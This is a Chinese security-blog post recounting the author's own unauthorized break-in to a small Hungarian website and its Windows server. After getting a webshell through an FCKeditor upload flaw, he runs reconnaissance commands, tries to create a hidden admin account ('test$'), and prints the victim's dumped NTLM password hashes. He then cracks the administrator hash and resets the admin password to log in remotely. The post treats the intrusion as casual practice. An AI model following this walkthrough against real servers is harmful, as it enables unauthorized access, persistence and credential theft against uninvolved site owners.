记一次匈牙利服务器提权案例

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签:

#Web安全   #漏洞复现   #工具使用   #权限提升

#权限维持   #防护绕过   #内网安全   #实战案例

#其他笔记   #资源分享   #MSF


0x01 前言

这个案例记录的是笔者2013年测试的一台服务器,大半夜醒来不知道干什么了,无聊的在“全球被黑站点统计系统”找到了一个匈牙利国家的小站来练手,直接利用BurpSutite成功突破Fckeditor2.5 PHP上传拿到Webshell权限,以前写过几篇Fckeditor-Getshell文章,这里就不再详细写了。


基本信息探测:

  • 目标站点:http://www.forras**aldorf.hu

  • 服务器IP:1*5.2*8.*6.1*4(匈牙利)

  • 环境平台:PHP/5.2.5

  • 服务器系统:Apache/2.2.8 (Win32) 


0x02 实战提权过程

打开Webshell后我们先搜集一下服务器的基本信息,看下是否有可直接利用的溢出漏洞和第三方提权软件,根据自己的个人提权习惯来测试吧。
  • 脚本探测:只支持php脚本,传个php大马,正常运行cmd;

  • 端口扫描:使用netstat -ano命令或大马端口扫描功能都可以;

  • 常用命令:命令太多了,根据实际情况使用吧,这里只列出部分常用的;

whoami             //查看当前用户权限net user           //查看系统所有用户tasklist           //查看系统运行进程net start          //查看系统开放服务systeminfo         //查看系统补丁情况netstat -ano       //查看系统开放端口net localgroup     //查看系统所有用户组net localgroup administrators   //查看系统管理员用户


使用以上命令探测后得知:3389端口开放并能正常连接,nt authoritysystem权限,本以为可以直接添加管理员用户,但实际情况并非如此,在执行命令完成后虽然显示成功,但是在登录3389时才发现并没有成功加入到管理组中,无法进行3389远程连接。

记一次匈牙利服务器提权案例


接下来我们根据自己目前所掌握的方法来查找这台服务器的管理组:

  • (1) net user:查看系统所有用户,使用“net user 用户名”命令来查看某个指定用户所属用户组有哪些,根据个人经验感觉Rendszergazda是管理员用户;

  • (2) net localgroup:查看系统所有用户组,这个命令执行无效,返回信息显示空白,进入系统后发现是因为“工作站服务尚未启动”导致无法执行这个命令的;

\ felhaszn爈 fijai-------------------------------------------------------------------------------123                      ASPNET                   assil                    fwi_ftp                  IUSR_FWI                 IWAM_FWI                 Rendszergazda            SUPPORT_388945a0         Vend俫                   waldorf                  A parancs egy vagy t攂b hib爒al fejez媎攖t be.
记一次匈牙利服务器提权案例


用“net user Rendszergazda”命令得知Rendszergazda这个用户在Rendszergazdák管理组下,现在基本可以确定这个就是管理组了。


经过后面的测试发现在这个Webshell权限下无法将用户添加进管理组,但是进入系统后在命令终端就可以成功添加进管理组,猜测应该是网页编码的问题吧!

net user test$ 123456 /add                    //命令成功执行net localgroup Rendszergazdák test$ /add      //执行后无回显
记一次匈牙利服务器提权案例


注:使用国内Webshell时会因为语言编码不同而出现网页乱码情况,国外Webshell也会存在一些偏差,不过还是建议用国外Webshell,这里测试了我老半天,吭死!


经过一段时间的测试发现怎样都添加不进Rendszergazdák管理组,蛋碎了一地,在这里添加管理组我是已经没有办法了,求知道方法的朋友给讲解下!


既然这条路行不通,那我们就换条思路,既然都已经nt authoritysystem权限了,那就尝试一下直接读取/破解NTLM-HASH登录目标服务器系统。

ASPNET:1008:ED9484FAD76A1B8BC66692931AB9AEAD:F65E39C42FA620A3265EFC4F714C6808:::assil:1009:AF4D115A275D5B70AAD3B435B51404EE:F83C3E2D3A19154BEFF4E041AF78F542:::IUSR_FWI:1003:EA3F9A9F411F0310B04815DB5176242D:D633105705AF5D5131D88C4725DE1AA3:::IWAM_FWI:1006:4592B335CD4E3AF32917EB6BA2690CAC:452E7E5073B4660C3CE59A6F0C2C694F:::Rendszergazda:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:7B5C007108744103BE8E6AFCCCAD4BFE::Vend:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::


http://www.objectif-securite.ch成功破解Rendszergazda管理员用户的NTLM-HASH,但是明文密码居然为“空”,先用mstsc.exe远程登录看一下是否能够登录进去吧。


最终连接提示信息:Nem lephet be a fiok korlatozasi miatt,翻译过来就是:由于账户限制,您无法登陆。

记一次匈牙利服务器提权案例


问了下基佬@宝哥说是:该用户不在Administrators管理组或Remote Desktop Users远程登录组,我这个基佬不管说话、做事都不是很靠普,所以也就没信他说的!最后通过百度找到真实原因是:组策略中禁止空密码用户通过网络登录,http://article.pchome.net/content-580248.html


最后实在是没办法了,只能通过执行“net user Rendszergazda 123456”命令来修改Rendszergazda管理员用户的密码,这种方式动静太大了,不到万不得已时并不推荐使用!

记一次匈牙利服务器提权案例


这台服务器大概测试了一个多小时才提下,被那个管理组整的我蛋疼,不知道还有没有其它方法能加进管理组。如果是system权限,我们还可以利用远控生成一个木马,然后在Webshell上直接运行即可。


0x03 问题总结

(1) 为什么在Webshell权限下无法将普通用户添加进管理组呢?

(2) 网站域名和IP地址都Ping不通,不知道是不是做了防Ping处理?

(3) netstat -ano命令查询没有3389端口,只有3390端口,但是都能正常远程连接?

(4) ipconfig /all命令执行返回如下:为什么IP是10.0.0.*(内网),但又能直接连接?

Windows IP konfiguráció   Állomásnév. . . . . . . . . . . . . . : fwi   Elsõdleges DNS-utótag . . . . . . . . :    Csomóponttípus  . . . . . . . . . . . : Ismeretlen   IP-útválasztás engedélyezve . . . . . : Nem   WINS-proxy engedélyezve . . . . . . . : NemEthernet-adapter Helyi kapcsolat:   Kapcsolatspecifikus DNS-utótag. . . . :    Leírás. . . . . . . . . . . . . . . . : Intel 21140 alapú PCI gyors Ethernet-adapterltalános)   Fizikai cím . . . . . . . . . . . . . : 00-03-FF-7F-76-59   DHCP engedélyezve . . . . . . . . . . : Nem   IP-cím. . . . . . . . . . . . . . . . : 10.0.0.2   Alhálózati maszk. . . . . . . . . . . : 255.255.255.0   Alapértelmezett átjáró. . . . . . .   : 10.0.0.1   DNS-kiszolgálók . . . . . . . . . . . : 10.0.0.1



只需在公众号回复“9527”即可领取一套HTB靶场学习文档和视频,1120领取安全参考等安全杂志PDF电子版1208领取一份常用高效爆破字典还在等什么?

记一次匈牙利服务器提权案例

本文始发于微信公众号(潇湘信安):记一次匈牙利服务器提权案例

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: